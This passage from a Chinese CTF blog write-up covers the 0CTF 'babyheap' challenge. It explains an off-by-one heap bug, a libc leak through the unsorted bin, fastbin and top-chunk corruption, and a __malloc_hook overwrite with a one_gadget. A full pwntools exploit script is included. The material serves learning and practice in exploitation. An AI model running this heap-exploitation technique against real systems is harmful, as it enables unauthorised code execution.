"</span>);</span><br><span class="line">  v3 = get_int();</span><br><span class="line">  <span class="keyword">if</span> ( v3 &gt;= <span class="number">0</span> &amp;&amp; v3 &lt;= <span class="number">15</span> &amp;&amp; a1[v3].flag == <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"Size: "</span>);</span><br><span class="line">    LODWORD(v1) = get_int();</span><br><span class="line">    size = v1;</span><br><span class="line">    <span class="keyword">if</span> ( (<span class="keyword">signed</span> <span class="keyword">int</span>)v1 &gt; <span class="number">0</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="comment">// off-by-one,这里把size的值增加了一</span></span><br><span class="line">      v1 = a1[v3].size + <span class="number">1</span>;</span><br><span class="line">      <span class="keyword">if</span> ( size &lt;= v1 )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">"Content: "</span>);</span><br><span class="line">        get_content(a1[v3].addr, size);</span><br><span class="line">        LODWORD(v1) = <span class="built_in">printf</span>(<span class="string">"Chunk %d Updated\n"</span>, (<span class="keyword">unsigned</span> <span class="keyword">int</span>)v3);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    LODWORD(v1) = <span class="built_in">puts</span>(<span class="string">"Invalid Index"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> v1;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<h3 id="漏洞利用-1"><a href="#漏洞利用-1" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>程序里面可以利用漏洞的就只有update中的<code>off-by-one</code>了，利用该漏洞可以修改下一个chunk中的size字段，修改该字段可以做什么呢？默认情况下分配的内容只可能是属于fastbin中的chunk，而且分配是采用的calloc函数，这样会将分配的内存的内容清0。</p>
<ul>
<li>如何进行信息泄露？</li>
</ul>
<p>通过修改size字段，将该字段的值设置为不属于fastbin范围内的chunk，这样在释放的时候会把该chunk放入到<code>unsorted bin</code>中，这样该chunk的<code>fd,bk</code>域中就存放了<code>main_arena+88</code>的地址，然后在分配原来大小的chunk，这样会从<code>unsorted bin</code>中把该chunk分配出去，并将<code>fd,bk</code>的值写入到剩余的chunk中，这样就可以通过view功能来泄露libc的地址了。</p>
<ul>
<li>如何控制程序流程？</li>
</ul>
<p>接着信息泄露部分，将<code>fd,bk</code>写入下一个chunk中，结构体数组中指向该chunk的指针没有被清0，因为该结构体还处于使用状态。如果这个时候在申请一个chunk，那么就会有一个新的结构体，它也指向这个chunk，即存在两个指针指向同一个chunk，这就相当于一个UAF了。</p>
<p>通过UAF可以修改已经在fastbin中的chunk的fd域，使其指向任意的地址，然后分配到该地址，但是这里有一个问题，需要绕过对size域的检查，但是这里没有合适的地方存在我们可以控制的size。这里从大佬们的题解中又学习了一波，既然可以控制了fastbin中的chunk的fd字段，那么便可以把指定的值写入到<code>main_arena</code>结构体中，这刚好可以解决找不到合适的size域的问题。这样就可以把<code>main_arena</code>的部分内存当做chunk分配出去，同时<code>main_arena</code>中还存放了<code>top_chunk</code>的地址，将该地址修改到<code>__malloc_hook</code>附近，然后就可以分配<code>__malloc_hook</code>附近的内存，将<code>__malloc_hook</code>赋值为<code>one_gadget</code>来实现控制程序流程。</p>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">debug=<span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">	p = process(<span class="string">'./babyheap'</span>)</span><br><span class="line">	libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)</span><br><span class="line">	<span class="keyword">print</span> <span class="string">'free_hook:'</span>+hex(libc.symbols[<span class="string">'__free_hook'</span>])</span><br><span class="line">	<span class="keyword">print</span> <span class="string">'malloc_hook:'</span>+hex(libc.symbols[<span class="string">'__malloc_hook'</span>])</span><br><span class="line">	</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">5555</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">allocate</span><span class="params">(size)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Command: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'1'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'Size: '</span>)</span><br><span class="line">	p.sendline(str(size))</span><br><span class="line">	<span class="comment"># p.recvuntil('Allocated\n')</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">update</span><span class="params">(index,size,content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Command: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'2'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'Index: '</span>)</span><br><span class="line">	p.sendline(str(index))</span><br><span class="line">	p.recvuntil(<span class="string">'Size: '</span>)</span><br><span class="line">	p.sendline(str(size))</span><br><span class="line">	p.recvuntil(<span class="string">'Content: '</span>)</span><br><span class="line">	p.send(content)</span><br><span class="line">	<span class="comment"># p.recvuntil('Updated\n')</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(index)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Command: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'3'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'Index: '</span>)</span><br><span class="line">	p.sendline(str(index))</span><br><span class="line">	p.recvuntil(<span class="string">'Deleted\n'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">view</span><span class="params">(index)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Command: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'4'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'Index: '</span>)</span><br><span class="line">	p.sendline(str(index))</span><br><span class="line"></span><br><span class="line"><span class="comment"># one_gadget = 0x45216 #rax=NULL</span></span><br><span class="line">one_gadget = <span class="number">0x4526a</span> <span class="comment">#[rsp+0x30] == NULL</span></span><br><span class="line"><span class="comment"># info leak</span></span><br><span class="line"><span class="comment"># leak libc addr</span></span><br><span class="line">allocate(<span class="number">0x58</span>) <span class="comment">#0</span></span><br><span class="line">allocate(<span class="number">0x38</span>) <span class="comment">#1</span></span><br><span class="line">allocate(<span class="number">0x38</span>) <span class="comment">#2</span></span><br><span class="line">allocate(<span class="number">0x48</span>) <span class="comment">#3</span></span><br><span class="line">allocate(<span class="number">0x48</span>) <span class="comment">#4</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># use off-by-one, make chunk1's size filed to be 0xd1(0x40+0x40+0x50)</span></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x58</span>+<span class="string">'\xd1'</span></span><br><span class="line">update(<span class="number">0</span>,<span class="number">0x59</span>,payload)</span><br><span class="line"><span class="comment"># chunk1's size not in fastbin range, it will be free to unsorted bin</span></span><br><span class="line"><span class="comment"># it's fd and bk field point to main_arena+88</span></span><br><span class="line"><span class="comment"># malloc 0x38, the chunk1's fd/bk will write to chunk2's fd/bk</span></span><br><span class="line">delete(<span class="number">1</span>) <span class="comment">#1</span></span><br><span class="line">allocate(<span class="number">0x38</span>) <span class="comment">#1</span></span><br><span class="line"><span class="comment"># leak main_arena+88's addr</span></span><br><span class="line">view(<span class="number">2</span>)</span><br><span class="line">p.recvuntil(<span class="string">']: '</span>)</span><br><span class="line">main_arena = u64(p.recv(<span class="number">8</span>))<span class="number">-88</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">'main_arena is :'</span>+hex(main_arena)</span><br><span class="line">libc_base = main_arena<span class="number">-0x3c4b20</span></span><br><span class="line">malloc_hook = libc_base+libc.symbols[<span class="string">'__malloc_hook'</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">'malloc hook'</span>+hex(malloc_hook)</span><br><span class="line"></span><br><span class="line"><span class="comment"># now unsorted bin has 0x40+0x50 space(chunk2 and chunk3)</span></span><br><span class="line"><span class="comment"># allocate(0x38),make ptr_array[5]=ptr_array[2]--&gt;chunk2</span></span><br><span class="line">allocate(<span class="number">0x38</span>) <span class="comment">#5==2</span></span><br><span class="line"><span class="comment"># allocate(0x48),make ptr_array[6]=ptr_array[3]--&gt;chunk2</span></span><br><span class="line">allocate(<span class="number">0x48</span>) <span class="comment">#6==3</span></span><br><span class="line"><span class="comment"># now we can hajack chunk2 and chunk3's fd filed, like UAF</span></span><br><span class="line">delete(<span class="number">2</span>)	   <span class="comment">#2</span></span><br><span class="line">payload = p64(<span class="number">0x51</span>)</span><br><span class="line"><span class="comment"># make 0x51 to fastbin, whitch used to fake chunk's size filed</span></span><br><span class="line">update(<span class="number">5</span>,len(payload),payload)</span><br><span class="line">allocate(<span class="number">0x38</span>) <span class="comment">#2</span></span><br><span class="line"></span><br><span class="line">delete(<span class="number">3</span>)</span><br><span class="line">payload = p64(main_arena+<span class="number">16</span>)</span><br><span class="line"><span class="comment"># make chunk3's fd --&gt; fake chunk(size=0x51)</span></span><br><span class="line">update(<span class="number">6</span>,len(payload),payload)</span><br><span class="line">allocate(<span class="number">0x48</span>) <span class="comment">#3</span></span><br><span class="line"><span class="comment"># malloc fake chunk</span></span><br><span class="line">allocate(<span class="number">0x48</span>) <span class="comment">#7</span></span><br><span class="line">payload = p64(<span class="number">0</span>)*<span class="number">7</span>+p64(main_arena<span class="number">-0x40</span>+<span class="number">4</span>)</span><br><span class="line"><span class="comment"># change top chunk to __malloc_hook nearby</span></span><br><span class="line">update(<span class="number">7</span>,len(payload),payload)</span><br><span class="line">allocate(<span class="number">0x58</span>) <span class="comment">#8</span></span><br><span class="line"><span class="comment"># malloc_hook--&gt;one_gadget addr</span></span><br><span class="line">payload = <span class="string">'a'</span>*(<span class="number">0x8</span>*<span class="number">3</span>+<span class="number">4</span>)+p64(libc_base+one_gadget)</span><br><span class="line">update(<span class="number">8</span>,len(payload),payload)</span><br><span class="line"><span class="comment"># trigger one_gadget</span></span><br><span class="line">allocate(<span class="number">0x20</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p><strong>题目链接: <a href="https://pan.baidu.com/s/1hYelxF1gJzJgnW3NSye40g" target="_blank" rel="noopener">https://pan.baidu.com/s/1hYelxF1gJzJgnW3NSye40g</a> 提取码: rsu4</strong></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/10/09/wangdingbei/网鼎杯-EasyCoin/" rel="next" title="网鼎杯-EasyCoin">
                <i class="fa fa-chevron-left"></i> 网鼎杯-EasyCoin
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/10/25/huwangbei/huwangbei-1/" rel="prev" title="护网杯-部分writeup">
                护网杯-部分writeup <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">e3pem</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">16</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://p4nda.top/" title="P4nda" target="_blank">P4nda</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://sunichi.github.io/" title="Sunichi" target="_blank">Sunichi</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0ctf-baby题"><span class="nav-number">1.</span> <span class="nav-text">0ctf-baby题</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#babystack"><span class="nav-number">1.1.</span> <span class="nav-text">babystack</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#程序分析"><span class="nav-number">1.1.1.</span> <span class="nav-text">程序分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#dl-runtime-resolve函数介绍"><span class="nav-number">1.1.2.</span> <span class="nav-text">dl_runtime_resolve函数介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ret2-dl-runtime-resolve"><span class="nav-number">1.1.3.</span> <span class="nav-text">ret2_dl_runtime_resolve</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞利用"><span class="nav-number">1.1.4.</span> <span class="nav-text">漏洞利用</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#babyheap"><span class="nav-number">1.2.</span> <span class="nav-text">babyheap</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#程序分析-1"><span class="nav-number">1.2.1.</span> <span class="nav-text">程序分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞利用-1"><span class="nav-number">1.2.2.</span> <span class="nav-text">漏洞利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp"><span class="nav-number">1.2.3.</span> <span class="nav-text">exp</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">e3pem</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.3</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.3"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  












  





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
